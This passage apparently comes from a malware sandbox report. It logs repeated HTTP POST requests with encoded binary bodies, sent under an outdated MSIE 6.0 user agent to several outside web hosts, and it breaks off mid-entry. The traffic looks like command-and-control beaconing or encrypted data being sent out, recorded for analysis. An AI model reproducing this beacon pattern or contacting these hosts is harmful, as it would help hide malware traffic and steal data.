C2EAOXvXIpZXNjOwEuYRyWSfqBmBR5IX3/hIUZD07BvLzP5NKjC+tdA6DpVDaCUiO7lTANvLEGEJ1hU598lK9J/wHHESiSIGqWqZ8qrRF3VdLp7wn02CVYRWdW0iOL03w024MIAU2ukZosgmCsofAyYCQMUEaeUh0CtLd6XXOGcG28SxCP+dqPvsFFYViUnwIRYv+RUF619Iu6zvteyYshuWlHhT4FNacsh3ybBtgBa9S/rMKAdNScDUloeBKFgxQ5CpBhSsU+HIlm0mwg+ly29QyOCI1saxqrkNDDJ23PBZst7XZokyupZKERbyhA20X/RJmw3NvXKsVbQqQUeo8nI+l1zX5ZzBd5jBNBMfB43HnFrSlQV35aQ9YUDSLP3PbX6zjhWUtBVHjgUfCF7tFs2oN8g4vSh+y1y6rI1H7RFD1SG5TrGYPtL3oXtJs4QOlFgZyQLGlc84m97n+O1wyQrw+bevafY8Mi6hA/vQzMpYIc5QV/7B9Pz2abFVY5Sw32I1JzmpD3TU1qjs95o+snq07YwO/92lt/Xb5lgFA4V6xJBtclXSfSDVO7G9yKJcsg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 5a 6e 67 36 4d 71 55 2f 4d 35 5a 5a 36 78 42 38 54 4f 79 42 66 78 35 37 48 4a 6e 7a 47 79 6f 76 71 65 5a 72 33 72 7a 35 68 5a 44 43 37 74 66 33 4f 68 6c 2b 39 56 5a 70 32 37 71 61 4c 4e 4b 39 52 37 70 74 42 67 32 53 6b 4b 64 41 52 74 44 69 69 35 44 66 55 72 46 75 63 49 50 54 50 34 4c 72 57 2b 46 76 30 48 6a 2b 65 56 6f 46 4b 4c 78 6a 5a 75 4c 33 38 61 57 70 65 31 6c 7a 4d 4d 56 6d 71 32 76 58 6a 6e 71 37 38 2f 51 49 38 41 50 61 63 4f 31 46 70 34 47 36 73 58 39 45 6c 2b 6e 57 52 38 43 6c 42 38 5a 2f 53 63 78 49 2b 50 4f 4f 63 41 78 39 70 45 31 48 47 66 78 77 4f 52 4b 75 43 6e 72 61 34 41 79 6e 72 6a 5a 4c 36 75 6c 49 66 62 30 32 4a 58 65 4a 71 36 54 36 57 65 32 7a 30 4b 55 74 37 39 75 77 76 69 61 41 78 4a 41 75 79 43 44 71 4c 51 6d 70 70 30 58 55 67 34 62 2b 7a 46 36 70 45 78 4b 57 6c 47 46 4e 6f 7a 42 72 67 78 37 36 73 35 75 44 59 78 73 51 36 38 66 66 31 43 76 59 44 5a 6b 2b 68 6a 4f 4d 4e 46 58 58 51 68 71 50 76 63 49 6a 4e 73 75 69 39 6f 33 77 34 58 65 64 77 49 43 37 4a 65 41 45 6f 74 62 47 4c 4a 52 7a 39 48 7a 68 6d 59 71 7a 4b 71 46 5a 73 78 78 47 69 41 72 37 6f 5a 46 6f 6e 6d 50 31 70 47 35 36 66 6a 55 47 31 48 58 52 65 46 34 75 46 4e 50 37 6f 39 79 43 56 46 34 46 78 39 6e 61 73 46 76 47 44 55 69 4a 70 42 38 39 45 66 66 49 63 70 4a 2b 43 32 77 34 30 58 50 58 68 71 53 2b 62 6b 31 64 68 7a 76 52 47 30 59 32 65 68 67 49 2f 2f 44 64 6d 67 51 4f 70 70 6c 55 77 48 72 55 44 6b 34 77 48 41 32 43 7a 2b 76 6b 54 31 54 6b 65 76 59 7a 55 41 71 44 6b 54 48 41 31 48 53 76 4c 4e 38 69 76 6b 41 38 6b 54 46 4b 58 72 56 65 59 4a 65 78 6a 31 49 57 7a 39 35 4d 66 6f 4a 48 Data Ascii: Zng6MqU/M5ZZ6xB8TOyBfx57HJnzGyovqeZr3rz5hZDC7tf3Ohl+9VZp27qaLNK9R7ptBg2SkKdARtDii5DfUrFucIPTP4LrW+Fv0Hj+eVoFKLxjZuL38aWpe1lzMMVmq2vXjnq78/QI8APacO1Fp4G6sX9El+nWR8ClB8Z/ScxI+POOcAx9pE1HGfxwORKuCnra4AynrjZL6ulIfb02JXeJq6T6We2z0KUt79uwviaAxJAuyCDqLQmpp0XUg4b+zF6pExKWlGFNozBrgx76s5uDYxsQ68ff1CvYDZk+hjOMNFXXQhqPvcIjNsui9o3w4XedwIC7JeAEotbGLJRz9HzhmYqzKqFZsxxGiAr7oZFonmP1pG56fjUG1HXReF4uFNP7o9yCVF4Fx9nasFvGDUiJpB89EffIcpJ+C2w40XPXhqS+bk1dhzvRG0Y2ehgI//DdmgQOpplUwHrUDk4wHA2Cz+vkT1TkevYzUAqDkTHA1HSvLN8ivkA8kTFKXrVeYJexj1IWz95MfoJH
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 6a 72 4a 6e 4d 68 39 42 4d 35 62 66 65 66 51 2f 66 70 73 43 70 61 68 49 56 65 4c 31 65 77 51 42 77 34 70 72 33 4c 4d 4d 65 68 4a 6f 7a 2b 77 50 36 45 70 52 78 32 4d 6d 47 2f 57 46 75 45 73 39 6e 6b 4b 53 73 50 79 48 7a 6c 69 53 70 78 59 33 49 4d 33 33 77 62 38 2b 43 4e 73 77 49 44 79 31 71 53 4b 43 58 75 62 43 43 51 54 55 74 2b 7a 35 43 47 6f 57 77 46 44 38 4f 45 72 57 35 4e 33 71 4d 48 62 50 39 34 6d 71 35 35 55 6a 64 4a 35 30 4e 38 6f 45 75 56 70 43 55 6f 39 46 4d 59 51 6d 73 34 79 37 48 52 4e 55 2f 4c 55 36 77 4a 55 6b 79 61 30 39 72 5a 6c 78 63 61 2f 6d 64 55 47 34 44 55 48 72 54 38 7a 6f 33 78 69 2f 72 59 6f 56 58 4b 71 65 66 37 6e 50 33 41 55 71 72 5a 43 50 65 53 41 74 4f 50 42 4f 34 72 54 5a 71 61 71 75 35 45 63 48 45 71 75 71 6f 72 79 77 32 4a 48 56 4c 73 47 48 63 35 43 65 68 6e 4a 78 76 32 66 31 56 30 43 30 33 62 70 49 44 64 4e 64 4a 4c 78 6a 39 4c 66 36 4b 67 48 69 72 38 6e 4b 74 4a 34 59 6d 4d 51 32 47 44 67 53 39 5a 37 6f 37 67 37 54 53 39 51 52 2b 66 52 63 42 54 56 36 70 65 68 67 31 73 44 34 57 75 36 38 6a 4a 4b 4b 52 70 37 2f 56 4f 77 73 6b 4b 4f 46 63 74 41 50 57 78 4d 66 64 65 52 41 65 53 39 69 54 64 67 58 57 54 62 78 77 79 68 6a 6d 6f 32 51 30 79 70 77 4a 52 51 6b 68 66 6d 39 6b 2f 2b 61 4c 6f 69 67 55 47 74 4a 56 56 62 54 64 66 77 44 72 56 72 38 38 64 64 4c 43 43 64 48 53 56 79 41 64 62 52 66 44 73 4a 68 58 4a 35 39 32 4c 73 46 4c 47 37 34 44 64 59 73 45 54 38 5a 6c 55 48 72 56 36 63 72 70 49 77 64 64 4f 75 45 6b 34 61 46 71 79 36 42 30 52 57 45 4c 35 50 75 69 30 69 55 72 31 6b 4e 4f 34 2f 45 79 46 56 49 4c 30 30 54 31 72 44 62 54 5a 63 3d Data Ascii: jrJnMh9BM5bfefQ/fpsCpahIVeL1ewQBw4pr3LMMehJoz+wP6EpRx2MmG/WFuEs9nkKSsPyHzliSpxY3IM33wb8+CNswIDy1qSKCXubCCQTUt+z5CGoWwFD8OErW5N3qMHbP94mq55UjdJ50N8oEuVpCUo9FMYQms4y7HRNU/LU6wJUkya09rZlxca/mdUG4DUHrT8zo3xi/rYoVXKqef7nP3AUqrZCPeSAtOPBO4rTZqaqu5EcHEquqoryw2JHVLsGHc5CehnJxv2f1V0C03bpIDdNdJLxj9Lf6KgHir8nKtJ4YmMQ2GDgS9Z7o7g7TS9QR+fRcBTV6pehg1sD4Wu68jJKKRp7/VOwskKOFctAPWxMfdeRAeS9iTdgXWTbxwyhjmo2Q0ypwJRQkhfm9k/+aLoigUGtJVVbTdfwDrVr88ddLCCdHSVyAdbRfDsJhXJ592LsFLG74DdYsET8ZlUHrV6crpIwddOuEk4aFqy6B0RWEL5Pui0iUr1kNO4/EyFVIL00T1rDbTZc=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 5a 6e 67 36 4d 71 55 2f 4d 35 5a 5a 36 78 42 38 54 4f 79 42 66 78 35 37 48 4a 6e 7a 47 79 6f 76 71 65 5a 72 33 72 7a 35 68 5a 44 43 37 74 66 33 4f 68 6c 2b 39 56 5a 70 32 37 71 61 4c 4e 4b 39 52 37 70 74 42 67 32 53 6b 4b 64 41 52 74 44 69 69 35 44 66 55 72 46 75 63 49 50 54 50 34 4c 72 57 2b 46 76 30 48 6a 2b 65 56 6f 46 4b 4c 78 6a 5a 75 4c 33 38 61 57 70 65 31 6c 7a 4d 4d 56 6d 71 32 76 58 6a 6e 71 37 38 2f 51 49 38 41 50 61 63 4f 31 46 70 34 47 36 73 58 39 45 6c 2b 6e 57 52 38 43 6c 42 38 5a 2f 53 63 78 49 2b 50 4f 4f 63 41 78 39 70 45 31 48 47 66 78 77 4f 52 4b 75 43 6e 72 61 34 41 79 6e 72 6a 5a 4c 36 75 6c 49 66 62 30 32 4a 58 65 4a 71 36 54 36 57 65 32 7a 30 4b 55 74 37 39 75 77 76 69 61 41 78 4a 41 75 79 43 44 71 4c 51 6d 70 70 30 58 55 67 34 62 2b 7a 46 36 70 45 78 4b 57 6c 47 46 4e 6f 7a 42 72 67 78 37 36 73 35 75 44 59 78 73 51 36 38 66 66 31 43 76 59 44 5a 6b 2b 68 6a 4f 4d 4e 46 58 58 51 68 71 50 76 63 49 6a 4e 73 75 69 39 6f 33 77 34 58 65 64 77 49 43 37 4a 65 41 45 6f 74 62 47 4c 4a 52 7a 39 48 7a 68 6d 59 71 7a 4b 71 46 5a 73 78 78 47 69 41 72 37 6f 5a 46 6f 6e 6d 50 31 70 47 35 36 66 6a 55 47 31 48 58 52 65 46 34 75 46 4e 50 37 6f 39 79 43 56 46 34 46 78 39 6e 61 73 46 76 47 44 55 69 4a 70 42 38 39 45 66 66 49 63 70 4a 2b 43 32 77 34 30 58 50 58 68 71 53 2b 62 6b 31 64 68 7a 76 52 47 30 59 32 65 68 67 49 2f 2f 44 64 6d 67 51 4f 70 70 6c 55 77 48 72 55 44 6b 34 77 48 41 32 43 7a 2b 76 6b 54 31 54 6b 65 76 59 7a 55 41 71 44 6b 54 48 41 31 48 53 76 4c 4e 38 69 76 6b 41 38 6b 54 46 4b 58 72 56 65 59 4a 65 78 6a 31 49 57 7a 39 35 4d 66 6f 4a 48 Data Ascii: Zng6MqU/M5ZZ6xB8TOyBfx57HJnzGyovqeZr3rz5hZDC7tf3Ohl+9VZp27qaLNK9R7ptBg2SkKdARtDii5DfUrFucIPTP4LrW+Fv0Hj+eVoFKLxjZuL38aWpe1lzMMVmq2vXjnq78/QI8APacO1Fp4G6sX9El+nWR8ClB8Z/ScxI+POOcAx9pE1HGfxwORKuCnra4AynrjZL6ulIfb02JXeJq6T6We2z0KUt79uwviaAxJAuyCDqLQmpp0XUg4b+zF6pExKWlGFNozBrgx76s5uDYxsQ68ff1CvYDZk+hjOMNFXXQhqPvcIjNsui9o3w4XedwIC7JeAEotbGLJRz9HzhmYqzKqFZsxxGiAr7oZFonmP1pG56fjUG1HXReF4uFNP7o9yCVF4Fx9nasFvGDUiJpB89EffIcpJ+C2w40XPXhqS+bk1dhzvRG0Y2ehgI//DdmgQOpplUwHrUDk4wHA2Cz+vkT1TkevYzUAqDkTHA1HSvLN8ivkA8kTFKXrVeYJexj1IWz95MfoJH
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 4e 71 39 56 6e 56 4d 4b 50 35 61 66 71 6c 6c 38 47 6f 76 61 2f 66 7a 50 79 39 55 35 58 35 42 70 4e 37 55 36 63 2f 2b 39 4e 50 77 77 62 45 64 32 4b 69 39 52 49 56 6c 37 67 58 76 72 56 62 72 51 76 56 56 75 76 6b 6d 37 68 33 30 33 74 70 75 79 64 6a 67 2f 4a 46 61 76 31 56 69 66 50 62 58 31 7a 32 6e 7a 31 31 53 48 2b 32 33 37 47 32 78 54 6d 71 31 6a 36 52 58 4b 5a 65 4e 2f 53 46 45 4c 6b 34 5a 73 35 62 49 62 69 4d 6a 68 39 74 66 66 49 54 61 36 76 5a 64 34 72 46 59 54 41 56 75 46 34 43 57 51 6d 36 76 6c 31 75 4f 6f 57 73 70 66 37 6b 33 52 4e 4d 38 6d 38 65 76 30 69 74 42 4d 44 67 64 31 45 75 45 4a 70 49 6d 5a 69 46 4a 31 52 38 75 51 54 32 35 48 77 52 67 46 5a 76 71 4a 52 31 36 32 7a 51 55 47 57 6b 78 43 6b 45 4a 7a 56 6a 30 4b 4a 43 67 6f 43 4f 67 45 78 42 70 6b 74 52 38 74 5a 53 2b 35 36 75 78 2f 77 31 32 50 2b 46 6e 6b 48 6a 4a 7a 73 74 54 4b 6a 35 6d 36 78 33 47 51 53 63 46 65 55 69 72 37 34 33 45 6c 55 5a 46 73 4c 6a 53 33 4a 67 4b 43 46 46 49 65 6d 55 51 75 4a 41 4d 53 41 79 6d 38 32 5a 35 6a 45 58 47 58 36 31 59 69 45 72 78 67 36 35 74 53 6a 62 52 62 41 58 6b 45 48 33 61 69 48 64 67 61 72 31 35 38 58 61 6c 72 31 6e 41 74 5a 73 56 79 37 78 44 36 4c 59 75 4c 64 54 36 66 38 52 58 66 36 34 46 46 43 74 69 64 2b 63 51 6e 6b 49 68 64 6c 33 66 4f 67 59 50 56 70 70 79 6c 77 33 31 45 67 59 68 34 47 30 2b 54 39 53 50 41 6c 2f 70 49 4f 4a 59 56 61 6c 34 2f 42 38 46 61 6f 38 74 4c 73 2f 4d 4a 77 49 48 71 49 53 71 4b 53 4b 78 50 2f 4d 6a 38 46 57 33 48 46 31 4d 62 6a 75 73 74 37 4b 53 66 65 43 34 59 6c 49 61 57 54 75 70 4e 6e 41 55 5a 43 50 32 34 36 64 56 63 4f 36 34 69 35 49 42 78 78 4d 67 4a 4a 6b 6c 6e 6e 6c 55 77 68 77 47 47 5a 31 66 37 4b 77 3d 3d Data Ascii: Nq9VnVMKP5afqll8Gova/fzPy9U5X5BpN7U6c/+9NPwwbEd2Ki9RIVl7gXvrVbrQvVVuvkm7h303tpuydjg/JFav1VifPbX1z2nz11SH+237G2xTmq1j6RXKZeN/SFELk4Zs5bIbiMjh9tffITa6vZd4rFYTAVuF4CWQm6vl1uOoWspf7k3RNM8m8ev0itBMDgd1EuEJpImZiFJ1R8uQT25HwRgFZvqJR162zQUGWkxCkEJzVj0KJCgoCOgExBpktR8tZS+56ux/w12P+FnkHjJzstTKj5m6x3GQScFeUir743ElUZFsLjS3JgKCFFIemUQuJAMSAym82Z5jEXGX61YiErxg65tSjbRbAXkEH3aiHdgar158Xalr1nAtZsVy7xD6LYuLdT6f8RXf64FFCtid+cQnkIhdl3fOgYPVppylw31EgYh4G0+T9SPAl/pIOJYVal4/B8Fao8tLs/MJwIHqISqKSKxP/Mj8FW3HF1Mbjust7KSfeC4YlIaWTupNnAUZCP246dVcO64i5IBxxMgJJklnnlUwhwGGZ1f7Kw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 6d 51 6a 70 6e 52 73 50 50 35 59 52 30 66 37 4d 4d 6e 6c 4b 64 77 54 55 52 74 75 68 70 38 70 2b 66 35 6f 56 77 6e 4b 39 48 52 4b 2f 7a 69 4e 7a 43 62 61 51 49 65 51 45 51 4b 4e 73 42 4b 67 57 6d 50 6e 54 41 55 6c 6d 68 5a 45 62 70 7a 44 46 6a 31 48 66 74 44 4d 31 67 77 68 63 64 4d 76 4f 67 61 52 64 7a 6d 45 2b 48 61 32 46 6b 78 52 2f 77 2f 6d 6a 49 4b 78 69 43 74 39 4a 32 77 56 48 71 46 62 47 6e 56 6a 68 36 32 4c 2b 54 66 45 4c 74 4b 30 33 2b 2f 34 30 46 38 59 43 55 30 2f 62 6e 34 34 32 6e 5a 55 71 34 47 79 61 6c 59 6a 31 4f 38 69 69 44 37 6b 49 6f 57 35 70 72 36 65 37 4c 69 4f 6d 44 56 6f 75 36 6b 46 71 4a 6e 62 4f 58 4b 55 69 2b 56 71 48 64 75 6c 34 58 61 78 64 31 57 62 63 45 67 35 6d 46 41 56 7a 6d 39 66 66 64 6b 4e 4c 52 43 63 46 59 4b 54 50 52 37 42 36 2b 70 6f 44 4d 62 78 37 71 38 67 55 32 67 31 46 75 2b 51 33 63 34 4f 30 44 43 58 69 4b 74 39 46 72 38 6d 50 44 75 65 4a 72 77 71 41 35 53 6b 65 6c 33 51 6b 4a 72 50 77 33 34 73 39 45 47 4d 7a 67 76 42 4f 54 61 4c 41 41 7a 36 52 75 76 72 56 39 6f 51 30 41 6d 59 50 6c 2f 2b 70 73 42 71 4c 6b 37 2f 4d 6c 6c 62 63 73 39 72 71 55 42 41 52 4d 77 51 36 6f 35 4a 2b 31 46 41 72 61 36 41 46 75 74 62 73 75 4f 76 65 37 6d 77 78 5a 4e 61 6f 42 74 47 4d 5a 75 39 73 31 6d 65 56 41 76 6d 52 62 42 4e 62 30 78 59 2f 78 33 66 48 35 32 77 5a 76 59 61 30 4b 55 61 56 47 59 31 62 7a 6a 43 4d 6f 44 30 76 56 61 77 77 73 66 54 65 34 4a 56 34 72 70 77 4b 77 4b 70 49 2f 57 34 38 4d 75 66 66 63 2f 69 45 56 4f 33 77 56 35 77 69 74 4a 6a 51 33 53 5a 48 50 43 59 77 47 4c 79 6e 56 30 77 54 78 63 51 70 55 77 56 6c 56 75 32 74 43 56 66 53 75 71 53 50 49 5a 76 4d 67 5a 48 2b 64 6d 47 6b 2f 67 3d 3d Data Ascii: mQjpnRsPP5YR0f7MMnlKdwTURtuhp8p+f5oVwnK9HRK/ziNzCbaQIeQEQKNsBKgWmPnTAUlmhZEbpzDFj1HftDM1gwhcdMvOgaRdzmE+Ha2FkxR/w/mjIKxiCt9J2wVHqFbGnVjh62L+TfELtK03+/40F8YCU0/bn442nZUq4GyalYj1O8iiD7kIoW5pr6e7LiOmDVou6kFqJnbOXKUi+VqHdul4Xaxd1WbcEg5mFAVzm9ffdkNLRCcFYKTPR7B6+poDMbx7q8gU2g1Fu+Q3c4O0DCXiKt9Fr8mPDueJrwqA5Skel3QkJrPw34s9EGMzgvBOTaLAAz6RuvrV9oQ0AmYPl/+psBqLk7/Mllbcs9rqUBARMwQ6o5J+1FAra6AFutbsuOve7mwxZNaoBtGMZu9s1meVAvmRbBNb0xY/x3fH52wZvYa0KUaVGY1bzjCMoD0vVawwsfTe4JV4rpwKwKpI/W48Muffc/iEVO3wV5witJjQ3SZHPCYwGLynV0wTxcQpUwVlVu2tCVfSuqSPIZvMgZH+dmGk/g==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 31 64 5a 63 33 42 48 47 4f 4a 61 57 64 31 41 4e 73 4d 6a 6b 30 32 6f 45 73 62 54 50 67 47 32 53 31 58 33 6a 4d 6f 65 4d 77 4f 5a 36 48 48 51 77 6c 50 50 47 5a 2b 77 41 43 70 56 66 55 57 46 47 69 67 72 2b 6b 58 51 77 73 4e 30 62 30 49 6e 56 6a 7a 38 6a 35 70 47 70 50 6b 63 61 4e 6c 7a 77 4d 76 59 67 2f 4c 69 53 7a 67 2f 48 77 4e 46 58 78 6a 76 6f 73 4a 63 62 72 78 45 75 4f 57 58 33 68 6c 65 57 65 67 4c 41 33 54 43 65 6d 66 53 49 74 7a 55 39 48 74 66 33 55 66 38 53 70 47 41 6f 79 50 6e 76 43 62 2f 58 44 54 6f 44 4b 70 66 65 36 57 5a 6c 76 59 4b 62 6d 69 46 48 56 7a 75 38 77 6a 50 6a 6a 57 7a 49 69 42 41 2b 2b 38 48 52 45 39 65 44 69 44 72 33 69 74 53 32 30 46 33 69 66 78 65 65 4c 64 68 75 44 59 59 73 46 42 37 46 38 55 63 31 4f 2b 5a 57 47 48 69 75 32 70 50 41 6c 34 37 79 78 52 5a 43 54 33 6b 53 33 62 59 73 7a 35 73 45 5a 7a 4e 42 33 56 2f 50 51 6f 49 67 54 4f 72 46 5a 58 42 77 4c 57 2b 55 4c 77 45 31 32 61 66 56 61 75 5a 77 6f 4a 45 35 59 34 75 49 6a 54 51 4a 30 64 58 62 6c 63 59 31 44 4f 4c 35 46 43 77 46 6b 65 54 64 34 58 72 48 6f 54 6c 68 57 63 51 45 43 79 68 2b 7a 66 33 47 48 30 44 39 5a 36 63 77 79 6f 34 56 32 61 62 46 78 6f 6f 51 6c 4e 6a 7a 48 33 4f 68 44 7a 4e 68 53 70 57 67 4c 53 50 63 74 37 6d 73 5a 45 32 4f 76 49 68 4e 54 45 6d 35 76 70 72 63 66 2b 31 4d 43 44 4b 39 74 2b 54 65 2b 56 59 33 79 45 6e 4a 52 54 56 72 76 79 30 49 6c 37 70 30 4c 44 6b 48 44 38 37 54 59 30 73 51 74 67 44 4f 68 67 62 6e 69 37 75 2b 68 36 6c 76 32 4d 32 51 59 47 42 57 30 76 6b 78 56 70 66 6d 35 69 2f 6a 57 6e 56 42 2f 2b 6d 44 7a 71 4c 62 46 4b 2f 2b 52 2f 52 62 39 6c 55 64 42 42 5a 51 78 37 5a 56 66 42 31 6b 6e 33 51 3d Data Ascii: 1dZc3BHGOJaWd1ANsMjk02oEsbTPgG2S1X3jMoeMwOZ6HHQwlPPGZ+wACpVfUWFGigr+kXQwsN0b0InVjz8j5pGpPkcaNlzwMvYg/LiSzg/HwNFXxjvosJcbrxEuOWX3hleWegLA3TCemfSItzU9Htf3Uf8SpGAoyPnvCb/XDToDKpfe6WZlvYKbmiFHVzu8wjPjjWzIiBA++8HRE9eDiDr3itS20F3ifxeeLdhuDYYsFB7F8Uc1O+ZWGHiu2pPAl47yxRZCT3kS3bYsz5sEZzNB3V/PQoIgTOrFZXBwLW+ULwE12afVauZwoJE5Y4uIjTQJ0dXblcY1DOL5FCwFkeTd4XrHoTlhWcQECyh+zf3GH0D9Z6cwyo4V2abFxooQlNjzH3OhDzNhSpWgLSPct7msZE2OvIhNTEm5vprcf+1MCDK9t+Te+VY3yEnJRTVrvy0Il7p0LDkHD87TY0sQtgDOhgbni7u+h6lv2M2QYGBW0vkxVpfm5i/jWnVB/+mDzqLbFK/+R/Rb9lUdBBZQx7ZVfB1kn3Q=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 4f 75 66 43 6e 64 30 4e 50 35 61 66 4c 74 62 6b 46 4c 57 39 56 78 61 2b 51 77 4f 4c 77 67 2f 43 59 54 79 6e 2f 45 30 68 51 6f 61 34 67 4f 33 53 68 6e 44 6d 45 42 33 6a 69 74 4c 50 4a 44 76 4c 6a 43 45 36 4a 38 56 50 31 71 36 69 70 36 38 4c 4a 59 34 49 48 64 4b 58 77 4a 61 7a 43 48 52 75 67 5a 68 6f 6c 44 67 6c 64 37 70 6f 38 67 57 75 6d 34 4f 4a 2b 38 73 59 4c 46 38 30 59 36 70 75 76 59 43 6a 48 4f 72 6c 6d 39 68 63 42 74 57 6c 68 45 31 65 35 68 63 33 2b 39 52 63 51 79 76 68 55 59 51 35 33 39 78 64 41 72 41 74 72 56 33 41 45 36 33 6b 54 78 77 66 66 78 4c 4c 6d 49 63 76 50 6c 71 65 30 6a 38 6c 6e 67 30 4d 6a 30 4e 69 39 62 4b 44 79 56 64 35 32 4c 4c 39 55 51 76 4c 35 42 2f 2f 6c 4f 43 5a 5a 4b 6a 55 35 30 67 46 56 31 48 4d 62 44 6d 73 5a 6f 42 6a 6f 65 61 6d 7a 75 7a 31 73 6a 63 44 4e 43 37 6e 63 65 6c 53 6a 6a 71 53 59 6c 47 45 35 66 2f 70 7a 71 6c 73 76 55 2f 78 77 50 4b 49 47 65 6d 54 2b 61 36 62 44 32 39 2b 65 42 42 48 4c 74 36 4d 6f 33 78 4d 31 70 76 79 6a 37 68 6c 79 4b 75 36 64 71 43 4a 30 6c 2b 49 52 66 70 4a 6c 62 41 65 35 6e 50 4c 42 30 70 69 32 32 36 68 63 6e 36 37 66 63 6b 4e 73 49 4c 4a 4f 34 30 6a 71 75 50 5a 4a 4e 7a 77 54 4e 79 69 64 35 54 54 5a 7a 65 62 7a 71 66 4e 54 51 6a 6b 4a 63 6b 6f 45 65 41 33 44 70 6c 38 57 38 44 2f 65 69 75 5a 38 30 72 77 53 51 56 57 68 42 46 58 43 43 67 2b 6a 33 6f 78 31 65 70 6b 44 2f 58 6b 51 74 48 2f 32 6d 64 42 73 70 55 62 76 58 7a 59 7a 6e 2f 4c 4d 6f 42 45 71 77 36 58 45 63 73 49 44 64 7a 32 49 65 4b 64 4d 39 77 4a 56 4e 48 7a 62 5a 4d 69 30 6c 76 4a 6e 71 74 59 4c 43 64 38 55 51 46 75 69 70 42 30 50 79 6b 78 37 48 51 4b 63 38 44 43 4f 49 46 7a 62 67 76 33 63 4a 47 70 39 76 58 7a 64 44 61 6f 67 56 65 42 52 62 32 57 4f 39 56 6a 32 68 54 70 76 33 30 48 41 6d 74 71 58 78 6e 37 Data Ascii: OufCnd0NP5afLtbkFLW9Vxa+QwOLwg/CYTyn/E0hQoa4gO3ShnDmEB3jitLPJDvLjCE6J8VP1q6ip68LJY4IHdKXwJazCHRugZholDgld7po8gWum4OJ+8sYLF80Y6puvYCjHOrlm9hcBtWlhE1e5hc3+9RcQyvhUYQ539xdArAtrV3AE63kTxwffxLLmIcvPlqe0j8lng0Mj0Ni9bKDyVd52LL9UQvL5B//lOCZZKjU50gFV1HMbDmsZoBjoeamzuz1sjcDNC7ncelSjjqSYlGE5f/pzqlsvU/xwPKIGemT+a6bD29+eBBHLt6Mo3xM1pvyj7hlyKu6dqCJ0l+IRfpJlbAe5nPLB0pi226hcn67fckNsILJO40jquPZJNzwTNyid5TTZzebzqfNTQjkJckoEeA3Dpl8W8D/eiuZ80rwSQVWhBFXCCg+j3ox1epkD/XkQtH/2mdBspUbvXzYzn/LMoBEqw6XEcsIDdz2IeKdM9wJVNHzbZMi0lvJnqtYLCd8UQFuipB0Pykx7HQKc8DCOIFzbgv3cJGp9vXzdDaogVeBRb2WO9Vj2hTpv30HAmtqXxn7
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 4e 71 39 56 6e 56 4d 4b 50 35 61 66 71 6c 6c 38 47 6f 76 61 2f 66 7a 50 79 39 55 35 58 35 42 70 4e 37 55 36 63 2f 2b 39 4e 50 77 77 62 45 64 32 4b 69 39 52 49 56 6c 37 67 58 76 72 56 62 72 51 76 56 56 75 76 6b 6d 37 68 33 30 33 74 70 75 79 64 6a 67 2f 4a 46 61 76 31 56 69 66 50 62 58 31 7a 32 6e 7a 31 31 53 48 2b 32 33 37 47 32 78 54 6d 71 31 6a 36 52 58 4b 5a 65 4e 2f 53 46 45 4c 6b 34 5a 73 35 62 49 62 69 4d 6a 68 39 74 66 66 49 54 61 36 76 5a 64 34 72 46 59 54 41 56 75 46 34 43 57 51 6d 36 76 6c 31 75 4f 6f 57 73 70 66 37 6b 33 52 4e 4d 38 6d 38 65 76 30 69 74 42 4d 44 67 64 31 45 75 45 4a 70 49 6d 5a 69 46 4a 31 52 38 75 51 54 32 35 48 77 52 67 46 5a 76 71 4a 52 31 36 32 7a 51 55 47 57 6b 78 43 6b 45 4a 7a 56 6a 30 4b 4a 43 67 6f 43 4f 67 45 78 42 70 6b 74 52 38 74 5a 53 2b 35 36 75 78 2f 77 31 32 50 2b 46 6e 6b 48 6a 4a 7a 73 74 54 4b 6a 35 6d 36 78 33 47 51 53 63 46 65 55 69 72 37 34 33 45 6c 55 5a 46 73 4c 6a 53 33 4a 67 4b 43 46 46 49 65 6d 55 51 75 4a 41 4d 53 41 79 6d 38 32 5a 35 6a 45 58 47 58 36 31 59 69 45 72 78 67 36 35 74 53 6a 62 52 62 41 58 6b 45 48 33 61 69 48 64 67 61 72 31 35 38 58 61 6c 72 31 6e 41 74 5a 73 56 79 37 78 44 36 4c 59 75 4c 64 54 36 66 38 52 58 66 36 34 46 46 43 74 69 64 2b 63 51 6e 6b 49 68 64 6c 33 66 4f 67 59 50 56 70 70 79 6c 77 33 31 45 67 59 68 34 47 30 2b 54 39 53 50 41 6c 2f 70 49 4f 4a 59 56 61 6c 34 2f 42 38 46 61 6f 38 74 4c 73 2f 4d 4a 77 49 48 71 49 53 71 4b 53 